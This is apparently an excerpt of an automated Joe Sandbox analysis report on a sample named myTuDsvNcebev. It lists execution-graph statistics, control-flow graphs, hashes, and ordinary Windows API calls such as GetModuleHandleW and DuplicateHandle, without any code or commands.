                                                                                          • Opcode Fuzzy Hash: ba79548308126482b15512953ac4dfe1d5c1b9fb0699a181e5e68c996112fe03
                                                                                          • Instruction Fuzzy Hash: 4F61B435600305DFDB04EF6AE590BAD7BB1FF48304F048469E205AB36ADB35AD94DB62

                                                                                          Execution Graph

                                                                                          Execution Coverage:8.2%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:78
                                                                                          Total number of Limit Nodes:6
                                                                                          execution_graph 18223 11ed418 18224 11ed45e GetCurrentProcess 18223->18224 18226 11ed4a9 18224->18226 18227 11ed4b0 GetCurrentThread 18224->18227 18226->18227 18228 11ed4ed GetCurrentProcess 18227->18228 18229 11ed4e6 18227->18229 18230 11ed523 18228->18230 18229->18228 18231 11ed54b GetCurrentThreadId 18230->18231 18232 11ed57c 18231->18232 18233 11e4668 18234 11e467a 18233->18234 18235 11e4686 18234->18235 18239 11e4778 18234->18239 18244 11e3e34 18235->18244 18237 11e46a5 18240 11e479d 18239->18240 18248 11e4888 18240->18248 18252 11e4879 18240->18252 18245 11e3e3f 18244->18245 18260 11e5c64 18245->18260 18247 11e6ff7 18247->18237 18250 11e48af 18248->18250 18249 11e498c 18249->18249 18250->18249 18256 11e44b4 18250->18256 18254 11e4888 18252->18254 18253 11e498c 18253->18253 18254->18253 18255 11e44b4 CreateActCtxA 18254->18255 18255->18253 18257 11e5918 CreateActCtxA 18256->18257 18259 11e59db 18257->18259 18261 11e5c6f 18260->18261 18264 11e5c84 18261->18264 18263 11e70c5 18263->18247 18265 11e5c8f 18264->18265 18268 11e5cb4 18265->18268 18267 11e71a2 18267->18263 18269 11e5cbf 18268->18269 18272 11e5ce4 18269->18272 18271 11e72a5 18271->18267 18273 11e5cef 18272->18273 18275 11e85ab 18273->18275 18278 11eac58 18273->18278 18274 11e85e9 18274->18271 18275->18274 18282 11ecd40 18275->18282 18288 11eac7f 18278->18288 18292 11eac90 18278->18292 18279 11eac6e 18279->18275 18283 11ecd71 18282->18283 18284 11ecd95 18283->18284 18300 11eceff 18283->18300 18304 11ecef1 18283->18304 18308 11ecf00 18283->18308 18284->18274 18289 11eac90 18288->18289 18295 11ead88 18289->18295 18290 11eac9f 18290->18279 18294 11ead88 GetModuleHandleW 18292->18294 18293 11eac9f 18293->18279 18294->18293 18296 11ead99 18295->18296 18297 11eadbc 18295->18297 18296->18297 18298 11eafc0 GetModuleHandleW 18296->18298 18297->18290 18299 11eafed 18298->18299 18299->18290 18301 11ecf0d 18300->18301 18303 11ecf47 18301->18303 18312 11eb760 18301->18312 18303->18284 18305 11ecf23 18304->18305 18306 11eb760 GetModuleHandleW 18305->18306 18307 11eceb7 18305->18307 18306->18307 18307->18284 18309 11ecf0d 18308->18309 18310 11ecf47 18309->18310 18311 11eb760 GetModuleHandleW 18309->18311 18310->18284 18311->18310 18313 11eb76b 18312->18313 18315 11edc58 18313->18315 18316 11ed064 18313->18316 18315->18315 18317 11ed06f 18316->18317 18318 11e5ce4 GetModuleHandleW 18317->18318 18319 11edcc7 18318->18319 18319->18315 18320 11ed660 18321 11ed6a2 DuplicateHandle 18320->18321 18322 11ed6f6 18321->18322

                                                                                          Executed Functions

                                                                                          Function 0A8E0448 Relevance: .6, Instructions: 629COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 706 a8e0448-a8e046a 708 a8e081a-a8e081f 706->708 709 a8e0470-a8e04ab 706->709 710 a8e0829-a8e082c 708->710 711 a8e0821-a8e0823 708->711 718 a8e04be-a8e04de 709->718 719 a8e04ad-a8e04b7 709->719 884 a8e082e call a8e0448 710->884 885 a8e082e call a8e0423 710->885 886 a8e082e call a8e0860 710->886 711->710 713 a8e0834-a8e083c 714 a8e0842-a8e0849 713->714 721 a8e04e0-a8e04ea 718->721 722 a8e04f1-a8e0511 718->722 719->718 721->722 724 a8e0524-a8e0544 722->724 725 a8e0513-a8e051d 722->725 727 a8e0546-a8e0550 724->727 728 a8e0557-a8e0560 call a8e020c 724->728 725->724 727->728 731 a8e0584-a8e058d call a8e021c 728->731 732 a8e0562-a8e057d call a8e020c 728->732 737 a8e058f-a8e05aa call a8e021c 731->737 738 a8e05b1-a8e05ba call a8e022c 731->738 732->731 737->738 744 a8e05bc-a8e05c0 call a8e023c 738->744 745 a8e05c5-a8e05e1 738->745 744->745 749 a8e05f9-a8e05fd 745->749 750 a8e05e3-a8e05e9 745->750 753 a8e05ff-a8e0610 call a8e024c 749->753 754 a8e0617-a8e065f 749->754 751 a8e05ed-a8e05ef 750->751 752 a8e05eb 750->752 751->749 752->749 753->754 760 a8e0683-a8e068a 754->760 761 a8e0661 754->761 763 a8e068c-a8e069b 760->763 764 a8e06a1-a8e06af call a8e025c 760->764 762 a8e0664-a8e066a 761->762 765 a8e084a-a8e0889 762->765 766 a8e0670-a8e0676 762->766 763->764 773 a8e06b9-a8e06e3 call a8e026c 764->773 774 a8e06b1-a8e06b3 764->774 775 a8e088b-a8e08ac 765->775 776 a8e08e8-a8e08f8 765->776 768 a8e0678-a8e067a 766->768 769 a8e0680-a8e0681 766->769 768->769 769->760 769->762 787 a8e06e5-a8e06f3 773->787 788 a8e0710-a8e072c 773->788 774->773 775->776 784 a8e08ae-a8e08b4 775->784 781 a8e0ace-a8e0ad5 776->781 782 a8e08fe-a8e0908 776->782 791 a8e0ad7-a8e0adf call a8e03a0 781->791 792 a8e0ae4-a8e0af7 781->792 785 a8e090a-a8e0911 782->785 786 a8e0912-a8e091c 782->786 789 a8e08b6-a8e08b8 784->789 790 a8e08c2-a8e08c7 784->790 793 a8e0922-a8e0962 786->793 794 a8e0b01-a8e0ba2 786->794 787->788 802 a8e06f5-a8e0709 787->802 804 a8e072e-a8e0738 788->804 805 a8e073f-a8e0766 call a8e027c 788->805 789->790 795 a8e08c9-a8e08cd 790->795 796 a8e08d4-a8e08e1 790->796 791->792 822 a8e097a-a8e097e 793->822 823 a8e0964-a8e096a 793->823 863 a8e0ba9-a8e0bdf 794->863 864 a8e0ba4 794->864 795->796 796->776 802->788 804->805 814 a8e077e-a8e0782 805->814 815 a8e0768-a8e076e 805->815 820 a8e079d-a8e07b9 814->820 821 a8e0784-a8e0796 814->821 818 a8e0772-a8e0774 815->818 819 a8e0770 815->819 818->814 819->814 831 a8e07bb-a8e07c1 820->831 832 a8e07d1-a8e07d5 820->832 821->820 826 a8e09ab-a8e09c3 call a8e0390 822->826 827 a8e0980-a8e09a5 822->827 824 a8e096e-a8e0970 823->824 825 a8e096c 823->825 824->822 825->822 844 a8e09c5-a8e09ca 826->844 845 a8e09d0-a8e09d8 826->845 827->826 834 a8e07c5-a8e07c7 831->834 835 a8e07c3 831->835 832->714 836 a8e07d7-a8e07e5 832->836 834->832 835->832 846 a8e07f7-a8e07fb 836->846 847 a8e07e7-a8e07f5 836->847 844->845 848 a8e09ee-a8e0a0d 845->848 849 a8e09da-a8e09e8 845->849 853 a8e0801-a8e0819 846->853 847->846 847->853 858 a8e0a0f-a8e0a15 848->858 859 a8e0a25-a8e0a29 848->859 849->848 865 a8e0a19-a8e0a1b 858->865 866 a8e0a17 858->866 861 a8e0a2b-a8e0a38 859->861 862 a8e0a82-a8e0acb 859->862 871 a8e0a6e-a8e0a7b 861->871 872 a8e0a3a-a8e0a6c 861->872 862->781 874 a8e0be9 863->874 875 a8e0be1 863->875 864->863 865->859 866->859 871->862 872->871 878 a8e0bea 874->878 875->874 878->878 884->713 885->713 886->713
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1938023408.000000000A8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_a8e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 37885507cec934d0aff0e02b3ca69a35b64a545c32c332fdb1769cd89e1ea85f
                                                                                          • Instruction ID: 2a195d3c00120cc92ed3a8641bd972c6c346846c4151c5595ae2acc69ccf1138
                                                                                          • Opcode Fuzzy Hash: 37885507cec934d0aff0e02b3ca69a35b64a545c32c332fdb1769cd89e1ea85f
                                                                                          • Instruction Fuzzy Hash: 9232CC30B45604CFDB19DBA8D854BAEBBF6AF8A304F254869E106DB391CB75EC01CB51
                                                                                          Function 011ED408 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 294 11ed408-11ed4a7 GetCurrentProcess 298 11ed4a9-11ed4af 294->298 299 11ed4b0-11ed4e4 GetCurrentThread 294->299 298->299 300 11ed4ed-11ed521 GetCurrentProcess 299->300 301 11ed4e6-11ed4ec 299->301 303 11ed52a-11ed545 call 11ed5e9 300->303 304 11ed523-11ed529 300->304 301->300 307 11ed54b-11ed57a GetCurrentThreadId 303->307 304->303 308 11ed57c-11ed582 307->308 309 11ed583-11ed5e5 307->309 308->309
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 011ED496
                                                                                          • GetCurrentThread.KERNEL32 ref: 011ED4D3
                                                                                          • GetCurrentProcess.KERNEL32 ref: 011ED510
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 011ED569
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1931369545.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_11e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$ProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 2063062207-0
                                                                                          • Opcode ID: b6cf0a75c5df33800b476e7415f1c90b989b12349cf83299fa7c40c1a749ed58
                                                                                          • Instruction ID: a4a9f1c432952d77069313cdbbdfac538fc68e9cda40643c022a8837f4ed097e
                                                                                          • Opcode Fuzzy Hash: b6cf0a75c5df33800b476e7415f1c90b989b12349cf83299fa7c40c1a749ed58
                                                                                          • Instruction Fuzzy Hash: 845158B0910609CFDB18DFA9E548BDEBBF1EF88318F24C459E019A72A0D7346944CF65
                                                                                          Function 011ED418 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 316 11ed418-11ed4a7 GetCurrentProcess 320 11ed4a9-11ed4af 316->320 321 11ed4b0-11ed4e4 GetCurrentThread 316->321 320->321 322 11ed4ed-11ed521 GetCurrentProcess 321->322 323 11ed4e6-11ed4ec 321->323 325 11ed52a-11ed545 call 11ed5e9 322->325 326 11ed523-11ed529 322->326 323->322 329 11ed54b-11ed57a GetCurrentThreadId 325->329 326->325 330 11ed57c-11ed582 329->330 331 11ed583-11ed5e5 329->331 330->331
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 011ED496
                                                                                          • GetCurrentThread.KERNEL32 ref: 011ED4D3
                                                                                          • GetCurrentProcess.KERNEL32 ref: 011ED510
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 011ED569
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1931369545.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_11e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$ProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 2063062207-0
                                                                                          • Opcode ID: cd916252280c737728d0fcba5617ac3f2b8421b866fb87e4c898a007524f5f7e
                                                                                          • Instruction ID: 7287f18546e93cdd436a9b81836053942b3d0483f1886f004da38de753df9305
                                                                                          • Opcode Fuzzy Hash: cd916252280c737728d0fcba5617ac3f2b8421b866fb87e4c898a007524f5f7e
                                                                                          • Instruction Fuzzy Hash: 355157B09106098FDB18DFAAE548BDEBBF1EF88318F24C459E409A7390D7346944CF65
                                                                                          Function 011EAD88 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 361 11ead88-11ead97 362 11ead99-11eada6 call 11ea0e0 361->362 363 11eadc3-11eadc7 361->363 369 11eadbc 362->369 370 11eada8 362->370 365 11eaddb-11eae1c 363->365 366 11eadc9-11eadd3 363->366 372 11eae1e-11eae26 365->372 373 11eae29-11eae37 365->373 366->365 369->363 417 11eadae call 11eb010 370->417 418 11eadae call 11eb020 370->418 372->373 374 11eae5b-11eae5d 373->374 375 11eae39-11eae3e 373->375 380 11eae60-11eae67 374->380 377 11eae49 375->377 378 11eae40-11eae47 call 11ea0ec 375->378 376 11eadb4-11eadb6 376->369 379 11eaef8-11eafb8 376->379 382 11eae4b-11eae59 377->382 378->382 412 11eafba-11eafbd 379->412 413 11eafc0-11eafeb GetModuleHandleW 379->413 383 11eae69-11eae71 380->383 384 11eae74-11eae7b 380->384 382->380 383->384 387 11eae7d-11eae85 384->387 388 11eae88-11eae91 call 11ea0fc 384->388 387->388 392 11eae9e-11eaea3 388->392 393 11eae93-11eae9b 388->393 394 11eaea5-11eaeac 392->394 395 11eaec1-11eaece 392->395 393->392 394->395 397 11eaeae-11eaebe call 11ea10c call 11ea11c 394->397 402 11eaed0-11eaeee 395->402 403 11eaef1-11eaef7 395->403 397->395 402->403 412->413 414 11eafed-11eaff3 413->414 415 11eaff4-11eb008 413->415 414->415 417->376 418->376
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 011EAFDE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1931369545.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_11e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: b489a9a3ef1a2e8317db003cba0ee6c52a1be2f23911e2c25de7bda29580f491
                                                                                          • Instruction ID: c28c9ccfa1d1ad167478ca991dfbd0dfd443e138eaf96c1897ac8c99be4ff068
                                                                                          • Opcode Fuzzy Hash: b489a9a3ef1a2e8317db003cba0ee6c52a1be2f23911e2c25de7bda29580f491
                                                                                          • Instruction Fuzzy Hash: DD715870A00B058FDB28DF69E44879ABBF5FF88304F00892DD58AD7A40DB75E945CB91
                                                                                          Function 011E590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 419 11e590c-11e59d9 CreateActCtxA 421 11e59db-11e59e1 419->421 422 11e59e2-11e5a3c 419->422 421->422 429 11e5a3e-11e5a41 422->429 430 11e5a4b-11e5a4f 422->430 429->430 431 11e5a60 430->431 432 11e5a51-11e5a5d 430->432 434 11e5a61 431->434 432->431 434->434
                                                                                          APIs
                                                                                          • CreateActCtxA.KERNEL32(?), ref: 011E59C9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1931369545.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_11e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID: Create
                                                                                          • String ID:
                                                                                          • API String ID: 2289755597-0
                                                                                          • Opcode ID: c8fb3edf5ec859790158e764ca9cc8ba2a0cd1f3c9222d880acc4a156560c0cf
                                                                                          • Instruction ID: 138b4ecbdf3022fbfaf46cd1f05a93eca3564416f4dbb608530b46064b6c6c98
                                                                                          • Opcode Fuzzy Hash: c8fb3edf5ec859790158e764ca9cc8ba2a0cd1f3c9222d880acc4a156560c0cf
                                                                                          • Instruction Fuzzy Hash: A441E2B5C00619CADB28CFA9C984BCDBBF6BF45708F20846AD408AB255DB756945CF50
                                                                                          Function 011E44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 435 11e44b4-11e59d9 CreateActCtxA 438 11e59db-11e59e1 435->438 439 11e59e2-11e5a3c 435->439 438->439 446 11e5a3e-11e5a41 439->446 447 11e5a4b-11e5a4f 439->447 446->447 448 11e5a60 447->448 449 11e5a51-11e5a5d 447->449 451 11e5a61 448->451 449->448 451->451
                                                                                          APIs
                                                                                          • CreateActCtxA.KERNEL32(?), ref: 011E59C9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1931369545.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_11e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID: Create
                                                                                          • String ID:
                                                                                          • API String ID: 2289755597-0
                                                                                          • Opcode ID: ad842e392536ab9b4dc5676189ded605c6dc656b97750764633e89dda8a9e387
                                                                                          • Instruction ID: fb96dc86e6aa725716f4bfca55da73956cb37bb68e1b04bf49ff45a26bf9abb6
                                                                                          • Opcode Fuzzy Hash: ad842e392536ab9b4dc5676189ded605c6dc656b97750764633e89dda8a9e387
                                                                                          • Instruction Fuzzy Hash: 6B41D3B4C00719CBDB28CFA9C984B8DBBF6FF45304F20846AD408AB255DB756945CF90
                                                                                          Function 011ED658 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 452 11ed658-11ed65c 453 11ed65e-11ed69f 452->453 454 11ed6a2-11ed6f4 DuplicateHandle 452->454 453->454 456 11ed6fd-11ed71a 454->456 457 11ed6f6-11ed6fc 454->457 457->456
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011ED6E7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1931369545.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_11e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: 72ee4bd7842952b69ef5723f34cf7a8f1d8035b9523a23c47dc7819eb3b4fca7
                                                                                          • Instruction ID: d1ee933df19f7fca842acc9c711a999689df37f28527ce59157b88afd6186072
                                                                                          • Opcode Fuzzy Hash: 72ee4bd7842952b69ef5723f34cf7a8f1d8035b9523a23c47dc7819eb3b4fca7
                                                                                          • Instruction Fuzzy Hash: 083139B5C002499FDB10CFAAD984ADEFFF4EF49320F14815AE958A7251C378A941DF61
                                                                                          Function 011ED660 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 460 11ed660-11ed6f4 DuplicateHandle 462 11ed6fd-11ed71a 460->462 463 11ed6f6-11ed6fc 460->463 463->462
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 011ED6E7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1931369545.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_11e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: 3c941330fc3c421d9a45b91ec509877b1b5c1b1f4e1e145b426e0e7abfdd9ad3
                                                                                          • Instruction ID: e2396d603b81375ce80de50ff7303e7d3d34e176167b5824f56b1eb799fc8647
                                                                                          • Opcode Fuzzy Hash: 3c941330fc3c421d9a45b91ec509877b1b5c1b1f4e1e145b426e0e7abfdd9ad3
                                                                                          • Instruction Fuzzy Hash: 9721C4B5D002499FDB10CF9AD984ADEBFF9EB48320F14841AE918A7350D378A944CF65
                                                                                          Function 011EAF78 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 466 11eaf78-11eafb8 467 11eafba-11eafbd 466->467 468 11eafc0-11eafeb GetModuleHandleW 466->468 467->468 469 11eafed-11eaff3 468->469 470 11eaff4-11eb008 468->470 469->470
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 011EAFDE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1931369545.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_11e0000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: eb697d1fa4726adacd336d961b0e95ba1b7e5043bdb022c86f4918d4e40c2d14
                                                                                          • Instruction ID: 57c0e335a75ca0c6329efea57c50e360bb4835d10b0c2d4f8b6dbafcb7ed6a9a
                                                                                          • Opcode Fuzzy Hash: eb697d1fa4726adacd336d961b0e95ba1b7e5043bdb022c86f4918d4e40c2d14
                                                                                          • Instruction Fuzzy Hash: 6C1110B5C006498FDB24CF9AD444BDEFBF8EF88324F14841AD529A7640C379A545CFA2
                                                                                          Function 00F7D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1930649941.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_f7d000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cba7154750a70574e778b54a14c122b98ba02e7e2a40299c001e1f109aea54e7
                                                                                          • Instruction ID: bfdc7526184976806e3e85f9b88e764fdcca811fdf7af089ba97698cf583bcf5
                                                                                          • Opcode Fuzzy Hash: cba7154750a70574e778b54a14c122b98ba02e7e2a40299c001e1f109aea54e7
                                                                                          • Instruction Fuzzy Hash: 032136B2504200DFCB04DF04C9C0B26BF75FF98324F60C56AE90D0B256C336E856EAA2
                                                                                          Function 00F7D4C4 Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1930649941.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_f7d000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7fab2bb49bd7394949b23e7e1ee301c2748e0968d2f68b2dd0773bedccf52749
                                                                                          • Instruction ID: e69bd3ba9a4d518510fa6c415d206ebfe5dc657e03b87b7f3d1f18ecbf2ecac2
                                                                                          • Opcode Fuzzy Hash: 7fab2bb49bd7394949b23e7e1ee301c2748e0968d2f68b2dd0773bedccf52749
                                                                                          • Instruction Fuzzy Hash: 692106B2504240DFCB15DF14D9C0B26BF75FF98328F68C56AE9090B256C336D856EBA2
                                                                                          Function 00F8D01C Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1930687638.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_f8d000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2328e616d7d7c04a0ab6c9b602214d1c41d78a9dad6f60fc25f0ff8a1ceef601
                                                                                          • Instruction ID: 3d48197d667136182194388824358ad285b301fb8aa2e28d2f1d1fadedf335c0
                                                                                          • Opcode Fuzzy Hash: 2328e616d7d7c04a0ab6c9b602214d1c41d78a9dad6f60fc25f0ff8a1ceef601
                                                                                          • Instruction Fuzzy Hash: D2212571504200DFCB14EF14D9C0B26BB65FF84324F20C56DD80A4B28AC336D807EB61
                                                                                          Function 00F8D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1930687638.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_f8d000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4f853d9d4aad46e893452c8fe61a298732215ca82a2cfb128eddd37e0927988e
                                                                                          • Instruction ID: 1f09bb5c2fc9f6689dc0c2d4bedb193428c02b8163f97a49aedf28723e1f1251
                                                                                          • Opcode Fuzzy Hash: 4f853d9d4aad46e893452c8fe61a298732215ca82a2cfb128eddd37e0927988e
                                                                                          • Instruction Fuzzy Hash: FC21F5B1A04204EFDB05EF14D9C0B66BB65FF84324F24C56DE9094B291C336D846EB61
                                                                                          Function 00F8D005 Relevance: .1, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1930687638.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_f8d000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 90c804c7044726910fb5c9ccaf939ab2fa9f4c4b5063a1723852c09858327eca
                                                                                          • Instruction ID: 759cadfd28a3c526e1cc80bd42ca26db036e1dec0625823156003a7ca371dcdf
                                                                                          • Opcode Fuzzy Hash: 90c804c7044726910fb5c9ccaf939ab2fa9f4c4b5063a1723852c09858327eca
                                                                                          • Instruction Fuzzy Hash: B02180755093808FDB12DF24D990715BF71EF46324F28C5EAD8498B6A7C33A980ACB62
                                                                                          Function 00F7D4BF Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1930649941.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_f7d000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                          • Instruction ID: eb56a06ab9c8093c0dea1df94cbabfecbc772c5c0eb25570cccb6ab2503e13c1
                                                                                          • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                          • Instruction Fuzzy Hash: 1111E976904240CFCB15CF14D5C4B16BF72FF94328F28C6AAD8494B656C336D456DB92
                                                                                          Function 00F7D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1930649941.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_f7d000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                          • Instruction ID: bfa2f3a14ab08d66303bb604e53a4d698f9f025aec14e5a026dc6e9e92339a48
                                                                                          • Opcode Fuzzy Hash: d470e05bf275f9961b8f2d54e60ae5f944f02dbb38b852c854ecf385a2209709
                                                                                          • Instruction Fuzzy Hash: F0112672804240DFCB16CF00D5C0B16BF72FF94324F24C2AAD8090B656C33AE85ADBA2
                                                                                          Function 00F8D1CF Relevance: .1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000009.00000002.1930687638.0000000000F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F8D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_9_2_f8d000_myTuDsvNcebev.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
